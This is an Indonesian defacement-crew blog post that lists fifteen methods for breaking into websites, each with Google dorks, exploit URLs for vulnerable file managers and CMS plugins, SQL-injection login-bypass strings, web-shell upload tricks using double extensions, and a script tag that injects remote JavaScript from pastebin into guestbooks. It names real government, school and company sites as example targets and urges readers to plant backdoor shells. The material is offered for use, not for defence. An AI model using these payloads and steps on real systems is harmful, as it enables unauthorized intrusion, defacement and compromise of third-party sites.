Metode (POC) Deface | LXI - 2019

Assalamualaikum Wr.Wb. yokk ketemu lagi dengan gw admin paling gans yekan :v
./The_N4R4NT.Oke disini gw akan kasih Jenis" POC Deface karena gw dah mulai males bikin konten.Dan demi LXI dan juga Rebelsuck karena sudah berjuang membuat tinggi,Terima kasih Friends :).

#(1) .Metode Roxy

DORK: Intitle:"Roxy File Manager" (silahkan kembangkan sendiri)

#(2) .Metode Com_Fabrik

Dork:
inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:
inurl:index.php?option=com_fabrik&view= site:
inurl:importcsv.php site:
inurl:viewTable?cid= site:com
(Selebihnya kebangin lg menggunakan imajinasi

#(3) .Metode Bypass

nih yg masih newbie tutor cara bypass admin. mohon di pahamin.

Bahan :
1. Dork (Ada di bawah ).
2. Shell Extensi .php.pjpeg atau php.xxxjpg
3. Kopi Item + Rokok.
4. Kesabaran :) Dork :
inurl:/admin.php intext:login intext:adminsitrator

inurl:/admin/index.php intext:username

inurl :/admin/Admin.php intext:login

inurl:/administrator/login.php intext:username

site:.inurl:/login.php intext:administrator intext:login
oke, simak tutorial di bawah ya :*
1. Dorking ke google.  
Misal gua pake dork:inurl:/administrator/login.php intext:admin login
2. Pilih salah satu website.
3. Isi username + pass dengan'=''or'
4. Jika vuln, maka akan masuk ke Control Panel/Admin Panel web tersebut.Jika login gagal, cari web yang lain. ( Ini guna kesabaran ) :v
5. Dan jika berhasil login, terserah kalian mau diapain:) .Bisa add/edit News atau mungkin kalo hoki nya bagus bisa upload shell :)

#(4) .Metode Myflip

[-] Dork MyFlipMarket: intext:Copyright 2014 - 2014. Powered by MyFlipMarket.com
Exploit nya: /admincp/index.php
Username: ' or 1=1 limit 1 -- -+
password : ' or 1=1 limit 1 -- -+

#(5) .Metode Elfinder

Dork = site:uhostfull.com
EXP = http://xaitools.ml/
Exploit= /_file-manager/php/connector.php

#(6) .Metode Sitefinity

•DORK: "Sitefinity: Login"

•EXPLOIT: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx


-JK SUDAH DI UPLOAD SCRIPNYA KETIK INI
namasite/Files/namadeface.html

#(7) .Metode Spawn Upload

DORK = inurl:”spaw2/uploads/files/” site:th

Exploit= spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files 

#(8) .Metode OJS

Deface OJS 
Dork: inurl:/index.php/index/user/register site:ac.id
1. Search google pake dork di atas
2. Pilih salah satu web yang pengen di gebug
3. Masukan exploit nya contoh.com/files/ kalo index off berarti vuln
4. Balik ke web yang mau di gebug
5. Register centang author aja jangan yang laen
6. masuk dasboard member
7. Klik new submasion / buat naskag
8. Centang semua
9. Upload Shell extensi .phtml / .html conth.phtml / contoh.html
Akses shell conth.com/files/journals/anka random/submassions/angka random/articles/angka random pas uplot shell.phtml
Nih coba

#(9) .Metode Register & Upload CMS SwaraKalibata

hello kali ini w (./The_N4R4NT ) 
bakal ngasi tutor depes buat kalean :v *mastah minggir dlu yak ni buat newbie kya w hehe 

bahan:
1. Sc depes
2. Shell backdoor (banyak ko di gugel tapi kali ini w pke punya indoxploit)
3. Dork:
intext:"PENDAFTARAN UNTUK KONTRIBUTOR ARTIKEL" 
(kembangin lagi biar bnyk yg vuln and verawan)


1.dorking dlu di gugel sperti biasa 

2.cari target yg menurut lu perawan dan bsa di tusbol dan masuk ke halaman register dengan cara tambahin /register.html kalo ada form pendaftaran kemungkinan bsa di tusbol(eksekusi) 

3.isi aje itu form pendaftaran asal juga gpp kalo sudah klik register nanti otomatis lu bakal di anter ke halaman admin 

4.upload shell lewat modul berita trus klik berita 

5.trus klik tambahkan data 

6.isi aja smua ngasal kecuali gambar *disitu lu upload shell kesayangan lu klo gbisa php di bypass ext jadi phtml ea 

7.akses shell ke berita yg tadi lu buat klik yg warna ijo 

8.nah tuh dah kliatan shell lu tinggal di klik 

9.boom kalean dah masuk shell nya ea :v 

Seterah dah mao ngapain semoga lu gamasuk penjara :v

Kalo mau tebas sana sini di backup dlu njing jd adminweb kaga gampang.. :v


#(10) .Metode KindEditor
dork : 
inurl:examples/uploadbutton.html (salin ini di search bar trus upload file deface html kalian yg belum punya edit aja punya aku ini dengan notepad)
poc : kindetor (walau sepele tpi bisa juga di mirrorkan 😉) apus txt d ujung html ya

#(11). .Metode Com_Collector

1.Dork Google 

Inurl:index.php?option=com_collector

2.Paste tulisan diatas pada pencarian Google

3.Pilih salah satu target
Salah dua juga gpp hehe

4.Sudah menemukan blm gan? Contoh

http://www.target.go.id/index.php bla bla bla

5.Kemudian paste Exploit ini.. paste dimana? Di hati kamu ea 😂

Index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

6.Contoh :

http://www.Targeti.go.id/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

7.Lalu Upload Shell favorit kalian, dan Deface enjoy wkkwwk !




#(12) .Metode CMS Joomla Dengan EXploit JDownloads Shell Upload

Let's Play with me Baby ;*

Dork : intext:"Powered by jDownloads"

(gunakan imajinasi vokepers lu, biar dapet yg vuln n verawan)

eXploit :
/index.php?option=com_jdownloads&Itemid=1&view=upload
atau
/index.php?option=com_jdownloads&Itemid=1&task=upload

Script Deface dengan ekstensi deface.html.j, deface.txt.j atau yang mau upload Shell silahkan siapkan shell.php.php.j

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jdownloads&Itemid=1&view=upload 

3. Vulnerability ~ Muncul Formulir 

4. Lalu isi data2 yang perlu tunjukkan imajinasi mu guys uploads script pepes mu atau shell kalian 
contoh Gua upload file mamam.php.php.j

5. Kalo sukses nanti Muncul icon +berwarna Hijau.

6. File/Shell Akses: /images/jdownloads/screenshots/filelu.php.


#(13) .Metode JSO BukuTamu

1.Dork : "Inurl:/Bukutamu.html site:.th"

Kembangkan otak vokepers mu nak

2.Script JSO Nih"

<script type="text/javascript" src="https://pastebin.com/raw/mgF6uvs2"></script>

Tinggal Edit

3.Bawa Enjoy Biar Otak FRESH beb :D
Step by Step nya nh beb jngn shafao mulu lu simak:

1.Dork : "Inurl:/Bukutamu.html" ,

Contoh target

Target : http://www.smktarunabangsa.sch.id/bukutamu.html

2.Isi Kolom :Name = Isi bebas,
Email = Isi bebas,
Pesan Anda = Masukkan 
Script JSO: 


Masukkan Kode Vertifikasi

Klo vuln akan muncul script kalian tadi, 

Tapi klo tidak vuln.. kurang tamvan berarti 


#(14) .Metode Fck Ea Ea :v

[+] DORK : inurl:tabid/176/Default.aspx
inurl:portals/0/
inurl:Fck/fcklinkgallery.aspx

[+] EXPLOIT :www.target.mu/[path]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

[+] CODE :

Javascript:__doPostBack('ctlURL$cmdUpload','')

[+] Access File :www.TARGET.mu/[path]/portals/0/Cakil.txt

[+] Support file :*. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc,*.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip, *.wrf [+] POC :

1. Dorking di gugel. Bukan di shafao oke :v wkkwkwk vis beb

2. Insert Exploit ,Klik Opsi Link Type : File, dan pilih Opsi File Location : Root

3. Ganti URL nya menjadi kode
javascript:__doPostBack('ctlURL$cmdUpload','')


4. Maka akan muncul form upload ea dan langsung aja klik tombol Browse
dan unggah file lu ya ;)

5. Nah jika sudah di unggah lalu access file lu bebz , 


#(15) .Metode Kind (Erjoy) Mamank :v

buka www.google.com

copy dork ini ==> inurl:examples/uploadbutton.html

akan muncul banyak web, pilih aja salah satu

contoh => http://redpoint.photonic.com.tw/Public/Js/kindeditor/examples/uploadbutton.html

di sana ada kolom buat file upload, upload file html yang sudah disiapkan

kemudian copy link tersebut dan pastekan dibelakang url.com

contoh => http://redpoint.photonic.com.tw/Public/Js/kindeditor/attached/file/20121112/20121112182049_93263.html

Yaa,Menurut Saya itu cukup,kami sebagai keluarga mengucapkan mohon maaf jika kami ketemu kalian terus war wer wor.Yaph Sekian saja Wassalamualaikum Wr.Wb.


Grets =
#Rebelsuck | |#Mr.Devilku|Mr.Hack_Devils||Mr.Semvak|| #BoboiBoy | #Restu X-PLOIT | #Mrs.Alice ||AlfaGans||Bandit X-PLER||Mr.Exel||R3M0NY3T | DROOTHSL | Mrs.Shierly | Mr.Hytho666 | Nopaasu | TuanMudaKNTL | XWhyNotX | @Malang Defacer ID | @Satanic Devil Official | @LolzSec X-PLOIT INDO OFFICIAL |


Whatsapp ./The_N4R4NT
⬆⬆⬆

1 Response to "Metode (POC) Deface | LXI - 2019"

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel